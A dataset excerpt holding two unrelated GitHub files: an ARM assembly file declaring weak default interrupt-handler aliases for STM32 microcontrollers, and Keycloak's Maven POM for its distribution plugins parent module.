.globl __exc_busfault
.set __exc_busfault, __default_handler
.weak __exc_usagefault
.globl __exc_usagefault
.set __exc_usagefault, __default_handler
.weak __stm32reservedexception7
.globl __stm32reservedexception7
.set __stm32reservedexception7, __default_handler
.weak __stm32reservedexception8
.globl __stm32reservedexception8
.set __stm32reservedexception8, __default_handler
.weak __stm32reservedexception9
.globl __stm32reservedexception9
.set __stm32reservedexception9, __default_handler
.weak __stm32reservedexception10
.globl __stm32reservedexception10
.set __stm32reservedexception10, __default_handler
.weak __exc_svc
.globl __exc_svc
.set __exc_svc, __default_handler
.weak __exc_debug_monitor
.globl __exc_debug_monitor
.set __exc_debug_monitor, __default_handler
.weak __stm32reservedexception13
.globl __stm32reservedexception13
.set __stm32reservedexception13, __default_handler
.weak __exc_pendsv
.globl __exc_pendsv
.set __exc_pendsv, __default_handler
.weak __exc_systick
.globl __exc_systick
.set __exc_systick, __default_handler
.weak __irq_wwdg
.globl __irq_wwdg
.set __irq_wwdg, __default_handler
.weak __irq_pvd
.globl __irq_pvd
.set __irq_pvd, __default_handler
.weak __irq_tamper
.globl __irq_tamper
.set __irq_tamper, __default_handler
.weak __irq_rtc
.globl __irq_rtc
.set __irq_rtc, __default_handler
.weak __irq_flash
.globl __irq_flash
.set __irq_flash, __default_handler
.weak __irq_rcc
.globl __irq_rcc
.set __irq_rcc, __default_handler
.weak __irq_exti0
.globl __irq_exti0
.set __irq_exti0, __default_handler
.weak __irq_exti1
.globl __irq_exti1
.set __irq_exti1, __default_handler
.weak __irq_exti2
.globl __irq_exti2
.set __irq_exti2, __default_handler
.weak __irq_exti3
.globl __irq_exti3
.set __irq_exti3, __default_handler
.weak __irq_exti4
.globl __irq_exti4
.set __irq_exti4, __default_handler
.weak __irq_dma1_channel1
.globl __irq_dma1_channel1
.set __irq_dma1_channel1, __default_handler
.weak __irq_dma1_channel2
.globl __irq_dma1_channel2
.set __irq_dma1_channel2, __default_handler
.weak __irq_dma1_channel3
.globl __irq_dma1_channel3
.set __irq_dma1_channel3, __default_handler
.weak __irq_dma1_channel4
.globl __irq_dma1_channel4
.set __irq_dma1_channel4, __default_handler
.weak __irq_dma1_channel5
.globl __irq_dma1_channel5
.set __irq_dma1_channel5, __default_handler
.weak __irq_dma1_channel6
.globl __irq_dma1_channel6
.set __irq_dma1_channel6, __default_handler
.weak __irq_dma1_channel7
.globl __irq_dma1_channel7
.set __irq_dma1_channel7, __default_handler
.weak __irq_adc
.globl __irq_adc
.set __irq_adc, __default_handler
.weak __irq_usb_hp_can_tx
.globl __irq_usb_hp_can_tx
.set __irq_usb_hp_can_tx, __default_handler
.weak __irq_usb_lp_can_rx0
.globl __irq_usb_lp_can_rx0
.set __irq_usb_lp_can_rx0, __default_handler
.weak __irq_can_rx1
.globl __irq_can_rx1
.set __irq_can_rx1, __default_handler
.weak __irq_can_sce
.globl __irq_can_sce
.set __irq_can_sce, __default_handler
.weak __irq_exti9_5
.globl __irq_exti9_5
.set __irq_exti9_5, __default_handler
.weak __irq_tim1_brk
.globl __irq_tim1_brk
.set __irq_tim1_brk, __default_handler
.weak __irq_tim1_up
.globl __irq_tim1_up
.set __irq_tim1_up, __default_handler
.weak __irq_tim1_trg_com
.globl __irq_tim1_trg_com
.set __irq_tim1_trg_com, __default_handler
.weak __irq_tim1_cc
.globl __irq_tim1_cc
.set __irq_tim1_cc, __default_handler
.weak __irq_tim2
.globl __irq_tim2
.set __irq_tim2, __default_handler
.weak __irq_tim3
.globl __irq_tim3
.set __irq_tim3, __default_handler
.weak __irq_tim4
.globl __irq_tim4
.set __irq_tim4, __default_handler
.weak __irq_i2c1_ev
.globl __irq_i2c1_ev
.set __irq_i2c1_ev, __default_handler
.weak __irq_i2c1_er
.globl __irq_i2c1_er
.set __irq_i2c1_er, __default_handler
.weak __irq_i2c2_ev
.globl __irq_i2c2_ev
.set __irq_i2c2_ev, __default_handler
.weak __irq_i2c2_er
.globl __irq_i2c2_er
.set __irq_i2c2_er, __default_handler
.weak __irq_spi1
.globl __irq_spi1
.set __irq_spi1, __default_handler
.weak __irq_spi2
.globl __irq_spi2
.set __irq_spi2, __default_handler
.weak __irq_usart1
.globl __irq_usart1
.set __irq_usart1, __default_handler
.weak __irq_usart2
.globl __irq_usart2
.set __irq_usart2, __default_handler
.weak __irq_usart3
.globl __irq_usart3
.set __irq_usart3, __default_handler
.weak __irq_exti15_10
.globl __irq_exti15_10
.set __irq_exti15_10, __default_handler
.weak __irq_rtcalarm
.globl __irq_rtcalarm
.set __irq_rtcalarm, __default_handler
.weak __irq_usbwakeup
.globl __irq_usbwakeup
.set __irq_usbwakeup, __default_handler
/*
 * Additional weak handler aliases that exist only on high-density
 * STM32F1 parts (TIM8, ADC3, FSMC, SDIO, TIM5..7, SPI3, UART4/5,
 * DMA2).  Guarded by the STM32_HIGH_DENSITY preprocessor symbol so
 * the symbols are not emitted for smaller devices.  Same
 * .weak/.globl/.set pattern as the unconditional aliases above.
 */
#if defined (STM32_HIGH_DENSITY)
/* TIM8 (advanced timer) break / update / trigger+commutation / capture-compare */
.weak __irq_tim8_brk
.globl __irq_tim8_brk
.set __irq_tim8_brk, __default_handler
.weak __irq_tim8_up
.globl __irq_tim8_up
.set __irq_tim8_up, __default_handler
.weak __irq_tim8_trg_com
.globl __irq_tim8_trg_com
.set __irq_tim8_trg_com, __default_handler
.weak __irq_tim8_cc
.globl __irq_tim8_cc
.set __irq_tim8_cc, __default_handler
/* ADC3 */
.weak __irq_adc3
.globl __irq_adc3
.set __irq_adc3, __default_handler
/* FSMC external memory controller */
.weak __irq_fsmc
.globl __irq_fsmc
.set __irq_fsmc, __default_handler
/* SDIO */
.weak __irq_sdio
.globl __irq_sdio
.set __irq_sdio, __default_handler
/* TIM5 */
.weak __irq_tim5
.globl __irq_tim5
.set __irq_tim5, __default_handler
/* SPI3 */
.weak __irq_spi3
.globl __irq_spi3
.set __irq_spi3, __default_handler
/* UART4 / UART5 */
.weak __irq_uart4
.globl __irq_uart4
.set __irq_uart4, __default_handler
.weak __irq_uart5
.globl __irq_uart5
.set __irq_uart5, __default_handler
/* Basic timers TIM6 / TIM7 */
.weak __irq_tim6
.globl __irq_tim6
.set __irq_tim6, __default_handler
.weak __irq_tim7
.globl __irq_tim7
.set __irq_tim7, __default_handler
/* DMA2 channels (channel 4 and 5 share one vector) */
.weak __irq_dma2_channel1
.globl __irq_dma2_channel1
.set __irq_dma2_channel1, __default_handler
.weak __irq_dma2_channel2
.globl __irq_dma2_channel2
.set __irq_dma2_channel2, __default_handler
.weak __irq_dma2_channel3
.globl __irq_dma2_channel3
.set __irq_dma2_channel3, __default_handler
.weak __irq_dma2_channel4_5
.globl __irq_dma2_channel4_5
.set __irq_dma2_channel4_5, __default_handler
#endif /* STM32_HIGH_DENSITY */
/*
 * Weak aliases for peripherals found on STM32F2/F4-class devices
 * (DMA2 streams, Ethernet, CAN2, USB OTG FS/HS, DCMI, CRYP, HASH/RNG,
 * FPU).  Same .weak/.globl/.set pattern as above.
 *
 * NOTE(review): these symbols use the CMSIS-style __irq_<Periph>_IRQHandler
 * naming, unlike the lowercase __irq_<periph> convention used earlier in
 * this file — presumably to match a vector table generated from ST's
 * CMSIS headers.  Confirm against the vector-table definition before
 * renaming anything.
 */
.weak __irq_DMA2_Stream4_IRQHandler
.globl __irq_DMA2_Stream4_IRQHandler
.set __irq_DMA2_Stream4_IRQHandler, __default_handler
/* Ethernet MAC and its wakeup (EXTI) interrupt */
.weak __irq_ETH_IRQHandler
.globl __irq_ETH_IRQHandler
.set __irq_ETH_IRQHandler, __default_handler
.weak __irq_ETH_WKUP_IRQHandler
.globl __irq_ETH_WKUP_IRQHandler
.set __irq_ETH_WKUP_IRQHandler, __default_handler
/* CAN2: transmit, receive FIFO 0/1, status-change/error */
.weak __irq_CAN2_TX_IRQHandler
.globl __irq_CAN2_TX_IRQHandler
.set __irq_CAN2_TX_IRQHandler, __default_handler
.weak __irq_CAN2_RX0_IRQHandler
.globl __irq_CAN2_RX0_IRQHandler
.set __irq_CAN2_RX0_IRQHandler, __default_handler
.weak __irq_CAN2_RX1_IRQHandler
.globl __irq_CAN2_RX1_IRQHandler
.set __irq_CAN2_RX1_IRQHandler, __default_handler
.weak __irq_CAN2_SCE_IRQHandler
.globl __irq_CAN2_SCE_IRQHandler
.set __irq_CAN2_SCE_IRQHandler, __default_handler
/* USB OTG full-speed */
.weak __irq_OTG_FS_IRQHandler
.globl __irq_OTG_FS_IRQHandler
.set __irq_OTG_FS_IRQHandler, __default_handler
/* Remaining DMA2 streams */
.weak __irq_DMA2_Stream5_IRQHandler
.globl __irq_DMA2_Stream5_IRQHandler
.set __irq_DMA2_Stream5_IRQHandler, __default_handler
.weak __irq_DMA2_Stream6_IRQHandler
.globl __irq_DMA2_Stream6_IRQHandler
.set __irq_DMA2_Stream6_IRQHandler, __default_handler
.weak __irq_DMA2_Stream7_IRQHandler
.globl __irq_DMA2_Stream7_IRQHandler
.set __irq_DMA2_Stream7_IRQHandler, __default_handler
/* USART6 */
.weak __irq_USART6_IRQHandler
.globl __irq_USART6_IRQHandler
.set __irq_USART6_IRQHandler, __default_handler
/* I2C3 event / error */
.weak __irq_I2C3_EV_IRQHandler
.globl __irq_I2C3_EV_IRQHandler
.set __irq_I2C3_EV_IRQHandler, __default_handler
.weak __irq_I2C3_ER_IRQHandler
.globl __irq_I2C3_ER_IRQHandler
.set __irq_I2C3_ER_IRQHandler, __default_handler
/* USB OTG high-speed: EP1 out/in, wakeup, global */
.weak __irq_OTG_HS_EP1_OUT_IRQHandler
.globl __irq_OTG_HS_EP1_OUT_IRQHandler
.set __irq_OTG_HS_EP1_OUT_IRQHandler, __default_handler
.weak __irq_OTG_HS_EP1_IN_IRQHandler
.globl __irq_OTG_HS_EP1_IN_IRQHandler
.set __irq_OTG_HS_EP1_IN_IRQHandler, __default_handler
.weak __irq_OTG_HS_WKUP_IRQHandler
.globl __irq_OTG_HS_WKUP_IRQHandler
.set __irq_OTG_HS_WKUP_IRQHandler, __default_handler
.weak __irq_OTG_HS_IRQHandler
.globl __irq_OTG_HS_IRQHandler
.set __irq_OTG_HS_IRQHandler, __default_handler
/* Camera interface */
.weak __irq_DCMI_IRQHandler
.globl __irq_DCMI_IRQHandler
.set __irq_DCMI_IRQHandler, __default_handler
/* Crypto, hash/RNG, FPU */
.weak __irq_CRYP_IRQHandler
.globl __irq_CRYP_IRQHandler
.set __irq_CRYP_IRQHandler, __default_handler
.weak __irq_HASH_RNG_IRQHandler
.globl __irq_HASH_RNG_IRQHandler
.set __irq_HASH_RNG_IRQHandler, __default_handler
.weak __irq_FPU_IRQHandler
.globl __irq_FPU_IRQHandler
.set __irq_FPU_IRQHandler, __default_handler
|
{
"pile_set_name": "Github"
}
|
<!--
~ Copyright 2016 Red Hat, Inc. and/or its affiliates
~ and other contributors as indicated by the @author tags.
~
~ Licensed under the Apache License, Version 2.0 (the "License");
~ you may not use this file except in compliance with the License.
~ You may obtain a copy of the License at
~
~ http://www.apache.org/licenses/LICENSE-2.0
~
~ Unless required by applicable law or agreed to in writing, software
~ distributed under the License is distributed on an "AS IS" BASIS,
~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
~ See the License for the specific language governing permissions and
~ limitations under the License.
-->
<!-- Aggregator/parent POM for Keycloak's internal Maven plugins
     (currently only the licenses-processor module).  Centralizes the
     Groovy and Maven-plugin-API dependencies and the plugin wiring
     needed to compile Groovy mojos and generate plugin descriptors. -->
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <artifactId>keycloak-distribution-parent</artifactId>
        <groupId>org.keycloak</groupId>
        <version>12.0.0-SNAPSHOT</version>
    </parent>
    <artifactId>keycloak-distribution-maven-plugins-parent</artifactId>
    <packaging>pom</packaging>
    <name>Keycloak Distribution Maven Plugins Parent</name>
    <dependencies>
        <!-- Groovy runtime for plugin mojos written in Groovy -->
        <dependency>
            <groupId>org.codehaus.groovy</groupId>
            <artifactId>groovy-all</artifactId>
            <version>2.4.12</version>
        </dependency>
        <!-- Maven plugin APIs; 'provided' because the Maven runtime
             supplies them when the plugin executes -->
        <dependency>
            <groupId>org.apache.maven</groupId>
            <artifactId>maven-plugin-api</artifactId>
            <version>3.3.9</version>
            <scope>provided</scope>
        </dependency>
        <dependency>
            <groupId>org.apache.maven</groupId>
            <artifactId>maven-core</artifactId>
            <version>3.3.9</version>
            <scope>provided</scope>
        </dependency>
        <!-- @Mojo/@Parameter annotations (compile-time only) -->
        <dependency>
            <groupId>org.apache.maven.plugin-tools</groupId>
            <artifactId>maven-plugin-annotations</artifactId>
            <version>3.4</version>
            <scope>provided</scope>
        </dependency>
    </dependencies>
    <modules>
        <module>licenses-processor</module>
    </modules>
    <build>
        <pluginManagement>
            <plugins>
                <!-- Compile Groovy sources alongside Java via GMavenPlus;
                     stubs are generated so Java can reference Groovy
                     classes, then removed after compilation -->
                <plugin>
                    <groupId>org.codehaus.gmavenplus</groupId>
                    <artifactId>gmavenplus-plugin</artifactId>
                    <version>1.6</version>
                    <executions>
                        <execution>
                            <id>compile-groovy</id>
                            <goals>
                                <goal>addSources</goal>
                                <goal>addTestSources</goal>
                                <goal>generateStubs</goal>
                                <goal>compile</goal>
                                <goal>removeStubs</goal>
                                <goal>generateTestStubs</goal>
                                <goal>compileTests</goal>
                                <goal>removeTestStubs</goal>
                            </goals>
                        </execution>
                    </executions>
                </plugin>
                <!-- Generate META-INF/maven/plugin.xml from mojo annotations -->
                <plugin>
                    <groupId>org.apache.maven.plugins</groupId>
                    <artifactId>maven-plugin-plugin</artifactId>
                    <executions>
                        <execution>
                            <id>generate-descriptor</id>
                            <goals>
                                <goal>descriptor</goal>
                            </goals>
                        </execution>
                    </executions>
                </plugin>
            </plugins>
        </pluginManagement>
    </build>
</project>
|
{
"pile_set_name": "Github"
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.